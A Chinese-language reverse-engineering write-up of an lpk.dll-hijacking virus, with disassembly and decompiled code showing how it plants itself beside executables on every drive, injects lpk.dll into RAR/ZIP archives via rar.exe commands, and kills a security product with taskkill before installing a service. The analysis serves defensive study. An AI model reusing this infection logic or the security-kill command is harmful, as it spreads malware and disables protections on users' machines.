lpk类病毒分析
病毒样本来源：http://www.52pojie.cn/thread-75591-1-1.html
除夕那天晚上自己写过一个 Lpk，并对 lpk 劫持机制做了点研究，所以今天晚上看这些应该会顺手很多。关于 lpk 劫持原理的文章请去我的 Blog 看笔记，这里就不废话了。
我的Lpk.cpp
http://hi.baidu.com/hackernewyangjt/blog/item/a4e15a8241ccaab10df4d200.html
直接把 Lpk11.dll 载入 IDA，先看 DllEntryPoint：
.text:10001A32 ; =============== S U B R O U T I N E =======================================
.text:10001A32
.text:10001A32 ; DllEntryPoint of the dropped lpk11.dll (the malicious stand-in for lpk.dll).
.text:10001A32 ; Only the fdwReason == 1 (DLL_PROCESS_ATTACH) path is visible; the paste stops
.text:10001A32 ; at the loc_10001AA9 separator, so the other-reason branch is not shown here.
.text:10001A32 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001A32 public DllEntryPoint
.text:10001A32 DllEntryPoint proc near
.text:10001A32
.text:10001A32 hLibModule = dword ptr 4
.text:10001A32 fdwReason = dword ptr 8
.text:10001A32 lpReserved = dword ptr 0Ch
.text:10001A32
.text:10001A32 cmp [esp+fdwReason], 1 ; DLL_PROCESS_ATTACH?
.text:10001A37 push esi
.text:10001A38 jnz short loc_10001AA9 ; any other reason -> branch not included in this paste
.text:10001A3A mov esi, [esp+4+hLibModule]
.text:10001A3E push 104h ; nSize = MAX_PATH (in WCHARs)
.text:10001A43 push offset ExistingFileName ; lpFilename -- this DLL's own path; Infect() later uses it as the CopyFileW source
.text:10001A48 push esi ; hModule
.text:10001A49 mov dword_10003290, esi ; cache own HMODULE in a global
.text:10001A4F call ds:GetModuleFileNameW
.text:10001A55 push esi ; hLibModule
.text:10001A56 call ds:DisableThreadLibraryCalls ; no THREAD_ATTACH/DETACH notifications for this DLL
.text:10001A5C call GetMutexName ; analyst-named helper, body not shown
.text:10001A61 cmp eax, 1
.text:10001A64 jnz short loc_10001AA2 ; anything but 1 -> skip all infection logic, only InitLpk
.text:10001A66 call IsVirusKernelFile ; analyst's label: "was this copy dropped by the virus core process?" (body not shown)
.text:10001A6B test eax, eax
.text:10001A6D jnz short loc_10001A7D
.text:10001A6F call CreateMutex ; analyst-named wrapper (no args pushed), not the raw Win32 API; its return convention is not visible
.text:10001A74 test eax, eax
.text:10001A76 jnz short loc_10001A7D
.text:10001A78 call ExpandVirusKernel ; only when the wrapper returned 0 -- presumably "no instance running yet": drop the core exe
.text:10001A7D
.text:10001A7D loc_10001A7D: ; CODE XREF: DllEntryPoint+3Bj
.text:10001A7D ; DllEntryPoint+44j
.text:10001A7D call IsCurrentFileLpk
.text:10001A82 cmp eax, 1
.text:10001A85 jnz short loc_10001AA2
.text:10001A87 push 0 ; lpName
.text:10001A89 push 0 ; bInitialState
.text:10001A8B push eax ; bManualReset = 1 (eax is still 1 here)
.text:10001A8C push 0 ; lpEventAttributes
.text:10001A8E call ds:CreateEventW
.text:10001A94 mov hHandle, eax ; Infect() polls this event with a 0 timeout; once it is signaled the scan threads bail out
.text:10001A99 test eax, eax
.text:10001A9B jz short loc_10001AA2
.text:10001A9D call StartInfectThraed ; [sic] starts the drive-scanning thread (see StartThread / FuckAllDisk below)
.text:10001AA2
.text:10001AA2 loc_10001AA2: ; CODE XREF: DllEntryPoint+32j
.text:10001AA2 ; DllEntryPoint+53j ...
.text:10001AA2 call InitLpk ; always runs; presumably wires up the genuine lpk.dll exports so the host process keeps working (body not shown)
.text:10001AA7 jmp short loc_10001AEC
.text:10001AA9 ; ---------------------------------------------------------------------------
; lpk11.StartThread (analyst's name): spawns the drive-scanning thread FuckAllDisk.
; CreateThread(NULL, 0, FuckAllDisk, NULL, CREATE_SUSPENDED, NULL). Flag 4 = CREATE_SUSPENDED,
; so the thread does not run until something calls ResumeThread on it; that call is not in the paste.
009119E6 <lpk11.StartThread> /$ 56 push esi
009119E7 |. 33F6 xor esi, esi ; esi = 0, reused for every NULL/0 argument below
009119E9 |. 56 push esi ; /pThreadId => NULL
009119EA |. 6A 04 push 4 ; |CreationFlags = CREATE_SUSPENDED
009119EC |. 56 push esi ; |pThreadParm => NULL
009119ED |. 68 D3189100 push <FuckAllDisk> ; |ThreadFunction = <lpk11.FuckAllDisk>
009119F2 |. 56 push esi ; |StackSize => 0
009119F3 |. 56 push esi ; |pSecurity => NULL
009119F4 |. FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
; lpk11.FuckAllDisk (analyst's name): walks drive numbers starting at 2 (C:) and starts one
; Infect thread per drive whose type check passes. Only the loop head is pasted; the
; skip/increment path at 0091195C and any ResumeThread are not shown.
009118D3 <lpk11.FuckAllDisk> . 81EC C4000000 sub esp, 0C4
009118D9 . 53 push ebx
009118DA . 55 push ebp
009118DB . 56 push esi
009118DC . 57 push edi
009118DD . 6A 60 push 60 ; /Length = 60 (96.) -- 24 dwords, one per drive C:..Z:?
009118DF . 8D4424 78 lea eax, dword ptr [esp+78] ; |
009118E3 . 50 push eax ; |Destination -- 96-byte local, zeroed; ebp below points at its start
009118E4 . 33FF xor edi, edi ; |
009118E6 . FF15 34209100 call dword ptr [<&KERNEL32.RtlZeroMem>; \RtlZeroMemory
009118EC > 6A 02 push 2
009118EE . 5B pop ebx ; ebx = 2 = first drive index (A:=0, B:=1, C:=2)
009118EF . 8D6C24 74 lea ebp, dword ptr [esp+74] ; ebp -> the zeroed per-drive table
009118F3 . C74424 10 180>mov dword ptr [esp+10], 18 ; 0x18 = 24, presumably the loop count (C: through Z:)
009118FB > 837D 00 01 cmp dword ptr [ebp], 1 ; slot already marked 1 -> skip this drive (who sets it is outside the paste)
009118FF . 74 5B je short 0091195C
00911901 . 53 push ebx
00911902 . FF15 B4209100 call dword ptr [<&SHELL32.#64>] ; shell32 ordinal 64, labelled shell32.DriveType by Olly; arg = drive index
00911908 . 83C0 FE add eax, -2
0091190B . 83F8 02 cmp eax, 2 ; is this an infectable drive type? keeps only results 2..4 -- DRIVE_REMOVABLE/FIXED/REMOTE if the values follow GetDriveType; CD-ROM (5) and RAM disk (6) are skipped
0091190E . 77 4C ja short 0091195C
00911910 . 33C0 xor eax, eax
00911912 . 50 push eax ; /pThreadId => NULL
00911913 . 6A 04 push 4 ; |CreationFlags = CREATE_SUSPENDED
00911915 . 53 push ebx ; |pThreadParm = drive index (Infect treats any value below 0x100 as a drive number)
00911916 . 68 77169100 push <Infect> ; |ThreadFunction = <lpk11.Infect>
0091191B . 50 push eax ; |StackSize => 0
0091191C . 50 push eax ; |pSecurity => NULL
0091191D . FF15 A0209100 call dword ptr [<&KERNEL32.CreateThre>; \CreateThread
来张图片
接下来用 IDA（Hex-Rays）看 Infect 线程函数。参数有两种用法：FuckAllDisk 传入的是盘符序号（从 2 即 C: 开始的小整数），InfectCompressFile 传入的是真实路径（临时目录）：
signed int __stdcall Infect(LPCWSTR lpString1)
{
  // Hex-Rays output as pasted (not compilable: the backslash escapes inside the wide-string
  // literals were lost in extraction, e.g. L"A:\" was L"A:\\"). Thread routine for one drive or
  // directory: plants this DLL as lpk.dll next to every .EXE it finds and hands .RAR/.ZIP
  // archives to InfectCompressFile. The paste is cut off mid-loop: the directory branch after
  // `break`, LABEL_27 (presumably the FindNextFileW step) and the closing brace are not shown.
  const WCHAR *v2; // eax@17
  struct _WIN32_FIND_DATAW FindFileData; // [sp+4h] [bp-668h]@6
  WCHAR String2; // [sp+254h] [bp-418h]@4
  WCHAR FileName; // [sp+45Ch] [bp-210h]@6
  HANDLE hFindFile; // [sp+664h] [bp-8h]@6
  int v7; // [sp+668h] [bp-4h]@1
  const WCHAR *v8; // [sp+674h] [bp+8h]@17
  v7 = 1;
  // hHandle is the manual-reset event created in DllEntryPoint. 258 == WAIT_TIMEOUT, i.e.
  // "still unsignaled"; any other result (signaled, or an invalid handle) aborts the scan.
  if ( WaitForSingleObject(hHandle, 0) != 258 )
    return 0;
  // Two calling conventions share one parameter: FuckAllDisk passes a raw drive index
  // (2 = C:), InfectCompressFile passes a real path. Anything below 0x100 is a drive index.
  if ( (unsigned int)lpString1 >= 0x100 )
  {
    lstrcpyW(&String2, lpString1);
  }
  else
  {
    lstrcpyW(&String2, L"A:\");              // originally L"A:\\"
    String2 += (unsigned __int16)lpString1;  // 'A' + index -> drive letter (String2 is really a WCHAR array)
  }
  lstrcpyW(&FileName, &String2);             // FileName keeps the bare directory path
  PathAppendW(&String2, &word_10002374);     // presumably the "*.*" search pattern (data not shown)
  hFindFile = FindFirstFileW(&String2, &FindFileData);
  if ( hFindFile == (HANDLE)-1 )
    return 1;
  lstrcpyW(&String2, &FileName);
  while ( 1 )
  {
    if ( !lstrcmpiW(FindFileData.cFileName, L".") || !lstrcmpiW(FindFileData.cFileName, L"..") )
      goto LABEL_27;
    if ( FindFileData.dwFileAttributes & 0x10 ) // FILE_ATTRIBUTE_DIRECTORY -> handled after the loop (cut off in this paste)
      break;
    v2 = PathFindExtensionW(FindFileData.cFileName);
    v8 = v2;
    if ( v2 )
    {
      if ( !lstrcmpiW(v2, L".EXE") ) // directory holds an .exe -> plant lpk.dll beside it (DLL search-order hijack)
      {
        lstrcpyW(&FileName, &String2);
        PathAppendW(&FileName, L"lpk.dll");
        if ( GetFileAttributesW(&FileName) != -1 ) // an lpk.dll already exists here -> leave it alone
          goto LABEL_27;
        CopyFileW(&ExistingFileName, &FileName, 1); // source = this DLL's own path (saved in DllEntryPoint); bFailIfExists = TRUE
        SetFileAttributesW(&FileName, 7u);          // 7 = READONLY | HIDDEN | SYSTEM
      }
      if ( !lstrcmpiW(v8, L".RAR") || !lstrcmpiW(v8, L".ZIP") )// archive infection path
      {
        if ( !FindFileData.nFileSizeHigh )
        {
          if ( FindFileData.nFileSizeLow < 0x3200000 ) // only archives under 50 MiB
          {
            lstrcpyW(&FileName, &String2);
            PathAppendW(&FileName, FindFileData.cFileName);
            InfectCompressFile(&FileName);
          }
        }
      }
    }
这个函数相对来说比较有意思：它借用本机安装的 WinRAR 自带的 rar.exe 来解包、放 lpk.dll、再打包，没装 WinRAR（或者找不到 rar.exe）就什么也不做：
DWORD __cdecl InfectCompressFile(int a1)
{
  // Hex-Rays output as pasted; backslash escapes inside the wide-string literals were lost in
  // extraction (L""" was L"\"", the quoted %s in the format strings were \"%s\"). Adds lpk.dll
  // to one .rar/.zip archive (a1 = its path) by driving the installed WinRAR's rar.exe through
  // cmd.exe. If HKCR\WinRAR\shell\open\command is missing or rar.exe is not next to WinRAR.exe,
  // the archive is left untouched.
  DWORD result; // eax@1
  wchar_t v2[2]; // eax@3
  UINT v3; // eax@6
  WCHAR CommandLine; // [sp+0h] [bp-824h]@6
  WCHAR PathName; // [sp+410h] [bp-414h]@6
  WCHAR FileName; // [sp+618h] [bp-20Ch]@1
  const WCHAR String2; // [sp+61Ah] [bp-20Ah]@3  -- i.e. FileName + 1 WCHAR (compare the stack offsets)
  int v8; // [sp+820h] [bp-4h]@1
  v8 = 520; // size of FileName in bytes (260 WCHARs), in/out for SHRegGetValueW
  // Default value of HKCR\WinRAR\shell\open\command, normally "<dir>\WinRAR.exe" "%1"; flags 2 = SRRF_RT_REG_SZ
  result = SHRegGetValueW(HKEY_CLASSES_ROOT, L"WinRAR\\shell\\open\\command", 0, 2, 0, &FileName, &v8);
  if ( !result )
  {
    if ( FileName == 34 ) // first WCHAR is '"': shift the string left by one to drop it, then cut at the closing quote
    {
      lstrcpyW(&FileName, &String2);
      *(_DWORD *)v2 = L"""; // originally L"\""
    }
    else
    {
      *(_DWORD *)v2 = L" "; // unquoted path: cut at the first space
    }
    result = StrStrIW(&FileName, *(_DWORD *)v2);
    if ( result )
    {
      *(_WORD *)result = 0; // terminate at the delimiter -> bare WinRAR.exe path
      PathRemoveFileSpecW(&FileName);
      PathAppendW(&FileName, L"rar.exe"); // the console rar.exe shipped in the same directory
      result = GetFileAttributesW(&FileName);
      if ( result != -1 )
      {
        PathGetShortPath(&FileName); // 8.3 form -- presumably so the path survives the unquoted %s in the first command
        GetTempPathW(MAX_PATH, &PathName);
        v3 = GetCurrentThreadId();
        GetTempFileNameW(&PathName, L"IRAR", v3, &PathName); // non-zero uUnique: only builds the name %TEMP%\IRAR<tid>.tmp, nothing is created yet
        // Step 1: cmd /c <rar> vb "<archive>" lpk.dll | find /i "lpk.dll"  -- does the archive already carry lpk.dll?
        // (the decompiler rendered wsprintfW through a cast; the format has two %s but three values are passed)
        ((void (__cdecl *)(WCHAR *, _DWORD, WCHAR *, int, WCHAR *))wsprintfW)(
          &CommandLine,
          L"cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"",
          &FileName,
          a1,
          &PathName);
        // UpdatePackage presumably runs the command line with a timeout and returns its exit status (body not shown).
        // `find` exits 1 when nothing matched, so a non-zero result would mean "no lpk.dll in the archive yet".
        // _MAX_WAIT_MALLOC_CRT is just IDA's enum guess for the timeout constant (60000 in the CRT headers).
        result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        if ( result )
        {
          // Step 2: "<rar>" x "<archive>" *.exe "<tempdir>\"  -- extract every exe (timeout 0x1D4C0 = 120 s)
          wsprintfW(&CommandLine, L""%s" x "%s" *.exe "%s\\"", &FileName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x1D4C0u);
          // Step 3: run the normal directory infection on the temp dir; if any exe came out, it now holds lpk.dll
          Infect(&PathName);
          // Step 4: "<rar>" a -r -ep1"<tempdir>" "<archive>" "<tempdir>\lpk.dll"  -- pack lpk.dll back in (timeout 0x3A980 = 240 s).
          // Note the temp dir is glued straight onto the -ep1 switch; that is how the format string reads here.
          // Whether rar.exe's `a` really updates a .zip the same way is not something this listing tells us.
          wsprintfW(&CommandLine, L""%s" a -r -ep1"%s" "%s" "%s\\lpk.dll"", &FileName, &PathName, a1, &PathName);
          UpdatePackage(&CommandLine, 0x3A980u);
          // Step 5: cmd /c RD /s /q "<tempdir>"  -- clean up
          wsprintfW(&CommandLine, L"cmd /c RD /s /q "%s"", &PathName);
          result = UpdatePackage(&CommandLine, _MAX_WAIT_MALLOC_CRT);
        }
      }
    }
  }
  return result;
}
—— 其实压缩包感染这部分也没啥深奥的东西：全靠本机 WinRAR 自带的 rar.exe 先列目录确认里面还没有 lpk.dll、再解出 exe、放 lpk.dll、打包回去，最后删掉临时目录；没装 WinRAR 就直接跳过……
以下是病毒释放出来的核心 exe 程序的分析。
有趣的 IAT 加密：导入表不是直接填好的。每个导入槽前面都有一个 0x12 字节的 stub（push ecx / push edx / push 槽地址 / jmp 解密例程），解密例程把真实地址写进槽里，代码再经 jmp dword ptr [槽] 跳过去。
用 SOD 申请一块内存空间当计数器（下面 decode 里 inc dword ptr [AF0000] 用的应该就是它——其实 1 个字节足以……懒得找空地了、浪费下……）。
decode（写入 00403600 的字节；开头是 inc dword ptr [AF0000] / mov eax,[AF0000] / imul eax,eax,12h / lea eax,[eax+0040363C] / jmp eax，即按 0x12 字节步长逐个跳到每个导入 stub。后半段看起来就是原来的 LoadIconA stub 和 00403628 处的解密例程（push 00406978 / call 00403920 / pop edx / pop ecx），只是结尾的跳转被改成 EB CA 跳回 00403600 形成循环）：
FF 05 00 00 AF 00 A1 00 00 AF 00 6B C0 12 8D 80 3C 36 40 00 FF E0 FF 25 70 62 40 00 51 52 68 E0 8D 40 00 E9 00 00 00 00 68 78 69 40 00 E8 EE 02 00 00 5A 59 EB CA
将 decode 复制到 00403600：
00403600 $ FF05 0000AF00 inc dword ptr [AF0000]
然后把 EIP 设置到 00403600 直接运行：每一轮把计数器加一、按 0x12 字节步长跳到下一个 stub，让原来的解密例程填好对应的导入槽，然后跳回 00403600 继续；计数器越过 stub 表之后程序当掉，此时 IAT 已经解密完了……
用这段代码把第一部分 IAT（USER32 这一组）解密出来了：
00403636 .- FF25 E08D4000 jmp dword ptr [408DE0] ; USER32.LoadIconA
; First import group (USER32) after the analyst's decode pass. Every import is a 0x12-byte
; pair: a resolver stub `push ecx / push edx / push <IAT slot> / jmp 00403628` followed by the
; plain `jmp dword ptr [slot]` thunk the code actually calls. The stub pushes the slot of the
; thunk right after it. Before decoding a slot holds the address of its own stub (the second
; group below still shows [408DE8] -> 004036CC, i.e. this group's last stub), so the first call
; goes thunk -> stub -> resolver, which writes the real API address into the slot.
0040363C $ 51 push ecx
0040363D . 52 push edx
0040363E . 68 DC8D4000 push 00408DDC ; slot for the wsprintfA thunk at 00403648
00403643 .^ E9 E0FFFFFF jmp 00403628 ; group-1 resolver
00403648 .- FF25 DC8D4000 jmp dword ptr [408DDC] ; USER32.wsprintfA
0040364E $ 51 push ecx
0040364F . 52 push edx
00403650 . 68 D88D4000 push 00408DD8
00403655 .^ E9 CEFFFFFF jmp 00403628
0040365A .- FF25 D88D4000 jmp dword ptr [408DD8] ; USER32.GetDesktopWindow
00403660 $ 51 push ecx
00403661 . 52 push edx
00403662 . 68 E48D4000 push 00408DE4
00403667 .^ E9 BCFFFFFF jmp 00403628
0040366C .- FF25 E48D4000 jmp dword ptr [408DE4] ; USER32.SetWindowLongA
00403672 $ 51 push ecx
00403673 . 52 push edx
00403674 . 68 D08D4000 push 00408DD0
00403679 .^ E9 AAFFFFFF jmp 00403628
0040367E .- FF25 D08D4000 jmp dword ptr [408DD0] ; USER32.SendMessageA
00403684 $ 51 push ecx
00403685 . 52 push edx
00403686 . 68 CC8D4000 push 00408DCC
0040368B .^ E9 98FFFFFF jmp 00403628
00403690 .- FF25 CC8D4000 jmp dword ptr [408DCC] ; USER32.DrawIcon
00403696 $ 51 push ecx
00403697 . 52 push edx
00403698 . 68 C88D4000 push 00408DC8
0040369D .^ E9 86FFFFFF jmp 00403628
004036A2 .- FF25 C88D4000 jmp dword ptr [408DC8] ; USER32.GetClientRect
004036A8 . 51 push ecx
004036A9 . 52 push edx
004036AA . 68 C48D4000 push 00408DC4
004036AF .^ E9 74FFFFFF jmp 00403628
004036B4 .- FF25 C48D4000 jmp dword ptr [408DC4] ; USER32.GetSystemMetrics
004036BA $ 51 push ecx
004036BB . 52 push edx
004036BC . 68 D48D4000 push 00408DD4
004036C1 .^ E9 62FFFFFF jmp 00403628
004036C6 .- FF25 D48D4000 jmp dword ptr [408DD4] ; USER32.IsIconic
004036CC $ 51 push ecx
004036CD . 52 push edx
004036CE . 68 E88D4000 push 00408DE8
004036D3 .^ E9 50FFFFFF jmp 00403628 ; the analyst later patches this jmp to 00403600 for the second group
004036D8 .- FF25 E88D4000 jmp dword ptr [408DE8] ; USER32.EnableWindow
解密后第一组 IAT（槽地址 → 解析出的 USER32 地址）：
00408DC4 77D18F9C USER32.GetSystemMetrics
00408DC8 77D2908E USER32.GetClientRect
00408DCC 77D3D06C USER32.DrawIcon
00408DD0 77D2F3C2 USER32.SendMessageA
00408DD4 77D297FF USER32.IsIconic
00408DD8 77D2D1D2 USER32.GetDesktopWindow
00408DDC 77D1A8AD USER32.wsprintfA
00408DE0 77D2E8F6 USER32.LoadIconA
00408DE4 77D2C29D USER32.SetWindowLongA
00408DE8 77D29849 USER32.EnableWindow
第二部分 IAT（advapi32 这一组）的解密：这一组的解密例程在 004036EA，结尾 jmp short 004036D3 跳回去，于是把 004036D3 改成 jmp 00403600，让它接回上面的 decode 循环：
004036D3 >^/E9 28FFFFFF jmp 00403600
; Second import group (advapi32), same 0x12-byte stub/thunk layout, but with its own resolver
; at 004036EA: push 00406998 (this group's key/table, contents not shown) / call 00403920 /
; pop edx / pop ecx / jmp short 004036D3. In the state shown, 004036D3 has been patched by
; the analyst into `jmp 00403600` (the decode loop), so each resolved stub falls back into the
; loop for the next one. The first lines are still undecoded: [408DE8] points into the module
; (ggmqgk.004036CC = the last stub of group 1) and Olly reads the slot contents pushed at
; 00403700/00403712 as junk ASCII. The table after this listing is the decoded result.
004036D8 .^|FF25 E88D4000 jmp dword ptr [408DE8] ; ggmqgk.004036CC -- slot still points at its own stub, not at EnableWindow
004036DE $ |51 push ecx
004036DF . |52 push edx
004036E0 . |68 AC8D4000 push 00408DAC ; slot for the DeleteService thunk at 004036F8
004036E5 . |E9 00000000 jmp 004036EA ; jmp +0: falls straight into the resolver
004036EA > |68 98694000 push 00406998 ; group-2 resolver entry
004036EF . |E8 2C020000 call 00403920 ; the actual decoder (not shown); leaves the real API address in the slot
004036F4 . |5A pop edx
004036F5 . |59 pop ecx
004036F6 .^\EB DB jmp short 004036D3 ; -> patched jmp 00403600 (decode loop)
004036F8 .- FF25 AC8D4000 jmp dword ptr [408DAC] ; advapi32.DeleteService
004036FE $ 51 push ecx
004036FF . 52 push edx
00403700 . 68 B08D4000 push 00408DB0 ; ASCII "6L躻~i躻" -- Olly's reading of the still-encoded slot bytes
00403705 .^ E9 E0FFFFFF jmp 004036EA
0040370A .- FF25 B08D4000 jmp dword ptr [408DB0] ; advapi32.OpenServiceA
00403710 $ 51 push ecx
00403711 . 52 push edx
00403712 . 68 B48D4000 push 00408DB4 ; ASCII "~i躻"
00403717 .^ E9 CEFFFFFF jmp 004036EA
0040371C .- FF25 B48D4000 jmp dword ptr [408DB4] ; advapi32.OpenSCManagerA
00403722 $ 51 push ecx
00403723 . 52 push edx
00403724 . 68 A88D4000 push 00408DA8
00403729 .^ E9 BCFFFFFF jmp 004036EA
0040372E .- FF25 A88D4000 jmp dword ptr [408DA8] ; advapi32.RegCloseKey
00403734 $ 51 push ecx
00403735 . 52 push edx
00403736 . 68 A48D4000 push 00408DA4
0040373B .^ E9 AAFFFFFF jmp 004036EA
00403740 .- FF25 A48D4000 jmp dword ptr [408DA4] ; advapi32.RegQueryValueExA
00403746 $ 51 push ecx
00403747 . 52 push edx
00403748 . 68 A08D4000 push 00408DA0
0040374D .^ E9 98FFFFFF jmp 004036EA
00403752 .- FF25 A08D4000 jmp dword ptr [408DA0] ; advapi32.RegOpenKeyExA
00403758 . 51 push ecx
00403759 . 52 push edx
0040375A . 68 9C8D4000 push 00408D9C
0040375F .^ E9 86FFFFFF jmp 004036EA
00403764 .- FF25 9C8D4000 jmp dword ptr [408D9C] ; advapi32.SetServiceStatus
0040376A $ 51 push ecx
0040376B . 52 push edx
0040376C . 68 988D4000 push 00408D98
00403771 .^ E9 74FFFFFF jmp 004036EA
00403776 .- FF25 988D4000 jmp dword ptr [408D98] ; advapi32.RegisterServiceCtrlHandlerA
0040377C $ 51 push ecx
0040377D . 52 push edx
0040377E . 68 948D4000 push 00408D94
00403783 .^ E9 62FFFFFF jmp 004036EA
00403788 .- FF25 948D4000 jmp dword ptr [408D94] ; advapi32.StartServiceCtrlDispatcherA
0040378E $ 51 push ecx
0040378F . 52 push edx
00403790 . 68 908D4000 push 00408D90
00403795 .^ E9 50FFFFFF jmp 004036EA
0040379A .- FF25 908D4000 jmp dword ptr [408D90] ; advapi32.CloseServiceHandle
004037A0 $ 51 push ecx
004037A1 . 52 push edx
004037A2 . 68 8C8D4000 push 00408D8C
004037A7 .^ E9 3EFFFFFF jmp 004036EA
004037AC .- FF25 8C8D4000 jmp dword ptr [408D8C] ; advapi32.RegSetValueExA
004037B2 $ 51 push ecx
004037B3 . 52 push edx
004037B4 . 68 888D4000 push 00408D88
004037B9 .^ E9 2CFFFFFF jmp 004036EA
004037BE .- FF25 888D4000 jmp dword ptr [408D88] ; advapi32.RegOpenKeyA
004037C4 $ 51 push ecx
004037C5 . 52 push edx
004037C6 . 68 808D4000 push 00408D80
004037CB .^ E9 1AFFFFFF jmp 004036EA
004037D0 .- FF25 808D4000 jmp dword ptr [408D80] ; advapi32.StartServiceA
004037D6 $ 51 push ecx
004037D7 . 52 push edx
004037D8 . 68 848D4000 push 00408D84
004037DD .^ E9 08FFFFFF jmp 004036EA
004037E2 .- FF25 848D4000 jmp dword ptr [408D84] ; advapi32.CreateServiceA
解密后第二组 IAT（槽地址 → 解析出的 advapi32 地址）：
00408D80 77DBFB38 advapi32.StartServiceA
00408D84 77E071E9 advapi32.CreateServiceA
00408D88 77DAEFB8 advapi32.RegOpenKeyA
00408D8C 77DAEAD7 advapi32.RegSetValueExA
00408D90 77DB6CC5 advapi32.CloseServiceHandle
00408D94 77E07EB1 advapi32.StartServiceCtrlDispatcherA
00408D98 77DC4E96 advapi32.RegisterServiceCtrlHandlerA
00408D9C 77DC3231 advapi32.SetServiceStatus
00408DA0 77DA7842 advapi32.RegOpenKeyExA
00408DA4 77DA7AAB advapi32.RegQueryValueExA
00408DA8 77DA6C17 advapi32.RegCloseKey
00408DAC 77E07489 advapi32.DeleteService
00408DB0 77DC4C36 advapi32.OpenServiceA
00408DB4 77DC697E advapi32.OpenSCManagerA
—— 不过解密这些意义不大，IDA 本来就把导入都识别出来了，解出来只是自娱自乐。剩下的代码类似，
大家有兴趣可以自己玩。下面看核心 exe 的初始化（MFC 对话框的 OnInitDialog）：
.text:004029E0 ; =============== S U B R O U T I N E =======================================
.text:004029E0
.text:004029E0 ; Attributes: bp-based frame
.text:004029E0
.text:004029E0 ; OnInit (analyst's name) of the dropped core exe -- presumably its CDialog::OnInitDialog
.text:004029E0 ; override: it chains to CDialog::OnInitDialog and is referenced from .rdata (a vtable).
.text:004029E0 ; Hides its own dialog, tries to taskkill 360's active-defense process (judging by the
.text:004029E0 ; name ZhuDongFangYu = 主动防御), then either runs as the already-registered service
.text:004029E0 ; "Distribuvbf" or registers it under an MSDTC-lookalike display name.
.text:004029E0 OnInit proc near ; DATA XREF: .rdata:00406474o
.text:004029E0
.text:004029E0 ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -10h
.text:004029E0 var_8 = dword ptr -8
.text:004029E0 var_4 = dword ptr -4
.text:004029E0
.text:004029E0 push ebp
.text:004029E1 ; 8: v1 = this;
.text:004029E1 mov ebp, esp
.text:004029E3 sub esp, 10h
.text:004029E6 push esi
.text:004029E7 push edi
.text:004029E8 mov esi, ecx ; esi = this (thiscall)
.text:004029EA ; 9: CDialog__OnInitDialog();
.text:004029EA call ?OnInitDialog@CDialog@@UAEHXZ ; CDialog::OnInitDialog(void)
.text:004029EF ; 10: SendMessageA(*((HWND *)v1 + 8), 128u, 1u, *((_DWORD *)v1 + 24)); -- WM_SETICON, ICON_BIG
.text:004029EF mov eax, [esi+60h] ; icon handle stored in the dialog object
.text:004029F2 mov ecx, [esi+20h] ; the dialog's HWND
.text:004029F5 mov edi, SendMessageA
.text:004029FB push eax ; lParam = hIcon
.text:004029FC push 1 ; wParam = ICON_BIG
.text:004029FE push 80h ; Msg = WM_SETICON
.text:00402A03 push ecx ; hWnd
.text:00402A04 call edi ; SendMessageA
.text:00402A06 ; 11: SendMessageA(*((HWND *)v1 + 8), 0x80u, 0, *((_DWORD *)v1 + 24)); -- WM_SETICON, ICON_SMALL
.text:00402A06 mov edx, [esi+60h]
.text:00402A09 mov eax, [esi+20h]
.text:00402A0C push edx ; lParam = hIcon
.text:00402A0D push 0 ; wParam = ICON_SMALL
.text:00402A0F push 80h ; Msg = WM_SETICON
.text:00402A14 push eax ; hWnd
.text:00402A15 call edi ; SendMessageA
.text:00402A17 ; 12: if ( v1 )
.text:00402A17 test esi, esi ; CWnd::GetSafeHwnd-style null check on this
.text:00402A19 jnz short loc_402A1F
.text:00402A1B ; 15: v2 = 0;
.text:00402A1B xor eax, eax
.text:00402A1D jmp short loc_402A22
.text:00402A1F ; ---------------------------------------------------------------------------
.text:00402A1F ; 13: v2 = (HWND)*((_DWORD *)v1 + 8);
.text:00402A1F
.text:00402A1F loc_402A1F: ; CODE XREF: OnInit+39j
.text:00402A1F mov eax, [esi+20h]
.text:00402A22 ; 16: SetWindowLongA(v2, -20, 128); -- GWL_EXSTYLE = WS_EX_TOOLWINDOW: no taskbar button
.text:00402A22
.text:00402A22 loc_402A22: ; CODE XREF: OnInit+3Dj
.text:00402A22 push 80h ; dwNewLong = WS_EX_TOOLWINDOW
.text:00402A27 push 0FFFFFFECh ; nIndex = GWL_EXSTYLE (-20)
.text:00402A29 push eax ; hWnd
.text:00402A2A call SetWindowLongA
.text:00402A30 ; 17: CWnd__SetWindowPos(v1, 0, -100, -100, 0, 0, 1); -- park the window off-screen at (-100,-100); flag 1 = SWP_NOSIZE
.text:00402A30 push 1 ; uFlags = SWP_NOSIZE
.text:00402A32 push 0 ; cy
.text:00402A34 push 0 ; cx
.text:00402A36 push 0FFFFFF9Ch ; y = -100
.text:00402A38 push 0FFFFFF9Ch ; x = -100
.text:00402A3A push 0 ; pWndInsertAfter = NULL
.text:00402A3C mov ecx, esi
.text:00402A3E call ?SetWindowPos@CWnd@@QAEHPBV1@HHHHI@Z ; CWnd::SetWindowPos(CWnd const *,int,int,int,int,uint)
.text:00402A43 ; 18: WinExec("taskkill /f /im ZhuDongFangYu.exe /t", 0); // analyst's remark: doubts a plain taskkill can actually take that process down
.text:00402A43 ; 19 NOPs follow before the WinExec; IDA folds them into pseudocode line 18. Looks like padding or a patched-out call -- can't tell from the listing.
.text:00402A43 nop
.text:00402A44 nop
.text:00402A45 nop
.text:00402A46 nop
.text:00402A47 nop
.text:00402A48 nop
.text:00402A49 nop
.text:00402A4A nop
.text:00402A4B nop
.text:00402A4C nop
.text:00402A4D nop
.text:00402A4E nop
.text:00402A4F nop
.text:00402A50 nop
.text:00402A51 nop
.text:00402A52 nop
.text:00402A53 nop
.text:00402A54 nop
.text:00402A55 nop
.text:00402A56 push 0 ; uCmdShow = SW_HIDE
.text:00402A58 push offset CmdLine ; "taskkill /f /im ZhuDongFangYu.exe /t"
.text:00402A5D call ds:WinExec
.text:00402A63 ; 19: if ( RegOpenKey() ) -- analyst-named, argument-less wrapper (the key it opens is not visible); non-zero presumably means the service's registry key already exists
.text:00402A63 call RegOpenKey
.text:00402A68 pop edi
.text:00402A69 pop esi
.text:00402A6A test eax, eax
.text:00402A6C jz short loc_402A9D ; key missing -> register the service first
